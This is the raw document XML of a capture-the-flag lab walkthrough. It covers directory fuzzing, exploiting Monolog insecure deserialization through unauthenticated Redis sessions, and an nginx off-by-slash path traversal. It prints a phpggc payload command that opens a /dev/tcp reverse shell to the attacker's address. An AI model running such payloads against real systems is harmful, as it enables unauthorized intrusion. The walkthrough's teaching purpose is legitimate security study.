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SLASH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nz55ode84g9y"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41700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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6379 - REDIS</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6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accessing the website, we are redirected to the login screen. We can log in using the credentials </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin:admin</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6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gain access to the admin user’s home page. However, the application appears to be completely static. We can perform fuzzing on this application to find possible relevant files or directories. For this, I will use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 with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">quickhits.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> wordlist, which can be found at the link below:</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https://github.com/danielmiessler/SecLists</w:t>
        </w:r>
      </w:hyperlink>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color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -w quickhits.txt -u http://&lt;IP-MACHINE&gt;/FUZZ -ic -c -mc 200 -fs 0</w:t>
      </w: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-mc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> = Only status code 200</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">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-fs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> = File size greater than 0 (size &gt; 0)</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find two interesting files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composer.json</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;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Dockerfile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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dockerfile</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can see that the application is using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Redis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to store the session.</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70000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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by analyzing the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">composer.json</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, we can see that it is using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Monolog version 2.7</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is vulnerable to insecure deserialization.</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6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information in hand, we can execute commands remotely on the server (RCE). We can use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">phpggc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool to generate a payload that will return a reverse shell.</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will connect to Redis. For that, we can use the Redis command-line interface → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">redis-cli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68400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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Redis does not require authentication, we can connect without providing credentials. After connecting, we can see that our session is stored there.</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generate our payload using the tool below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">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PHPGGC</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a library of unserialize() payloads along with a tool to generate them, from the command line or programmatically.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/ambionics/phpggc</w:t>
        </w:r>
      </w:hyperlink>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list the available gadgets:</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./phpggc -l</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Because of private properties, when generating the payload it will contain some null bytes (non-ASCII bytes). Therefore, we need to redirect the output of our payload to a file. When we perform a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Redis, it will automatically escape those null bytes.</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./phpggc Monolog/RCE5 system "/bin/bash -c 'sh -i &gt;&amp; /dev/tcp/&lt;IP-VPN&gt;/4444 0&gt;&amp;1'" &gt; payload</w:t>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With the payload generated, we need to concatenate it as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">username|payload.</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04900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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write our payload into Redis.</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5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85900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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reload the page (F5) and the application will deserialize our session, triggering an RCE and returning a shell:</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5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70bnvb17m40g" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>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fully interactive TTYs.</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43000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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first flag located in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/infra</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66800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">docker-compose.yaml</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, we can see that there are two applications: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">external</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internal</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.We also notice that the root flag is located in the volume mounted at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of the internal application.</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92400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nginx.conf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file located in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/infra/proxy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we get the internal application’s domain name.</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25800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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Just below, we notice a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Path Traversal (off-by-slash)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability due to misconfiguration.</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25800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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Because of the misconfiguration, we can see that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">location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directive does not end with the directory separator (i.e.,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incorrect alias configuration, we can read any file stored outside the target directory. Another important detail is that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">autoindex is enabled</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which makes exploiting this vulnerability much easier.</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need to map the IP address to the domain name by adding a line to the hosts file, as shown in the image, so we can reach the internal host.</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5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that, we can access the domain in our browser.</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35100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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retrieve the final flag located in the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7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5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1511300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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1511300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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A">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7"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6" name="image21.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image2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Slash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8.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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2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hyperlink" Target="https://github.com/danielmiessler/SecLists" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ambionics/phpggc" TargetMode="External"/><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vaO624HHOuHeCM9HZmOM3hy6Q==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLm56NTVvZGU4NGc5eTIOaC43MGJudmIxN200MGcyDmguMTc1ZjVjczk0ejBvOAByITFidkdDX0c2WXpHeXFWbXp6U2ZmYXBOS0JYMkZaWWVOVw==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